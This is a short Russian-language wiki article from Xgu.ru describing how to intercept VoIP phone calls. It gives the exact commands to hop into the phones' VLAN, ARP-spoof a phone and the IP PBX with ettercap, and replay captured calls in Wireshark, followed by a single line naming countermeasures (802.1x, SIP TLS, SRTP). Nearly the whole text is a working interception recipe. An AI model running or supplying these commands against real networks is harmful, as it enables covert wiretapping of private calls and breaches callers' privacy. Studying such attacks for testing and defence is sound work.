VoIP-sniffing
Материал из Xgu.ru
- Автор: Сергей Бондаренко
ARP-spoofing для прослушивания VoIP звонков.
Содержание |
[править] VLAN-hoping
Переходим в VLAN где находятся телефоны:
sudo ifconfig vlan150 create sudo ifconfig vlan150 inet 172.16.150.172 netmask 255.255.255.0 vlan 150 vlandev en0
[править] ARP-sppofing
Делаем ARP-spoofing телефона (172.16.150.11) и IP PBX (172.16.150.1) :
sudo ettercap -i vlan150 -T -M arp -L etterlog /172.16.150.11/ /172.16.150.1/
[править] Wireshark
1. Start a new live capture -> select en0 -> sniff -> stop sniff
2. Telephony -> VoIP Calls -> select a call -> press Player
[править] Методы предотвращения
Использовать 802.1x, SIP TLS и SRTP.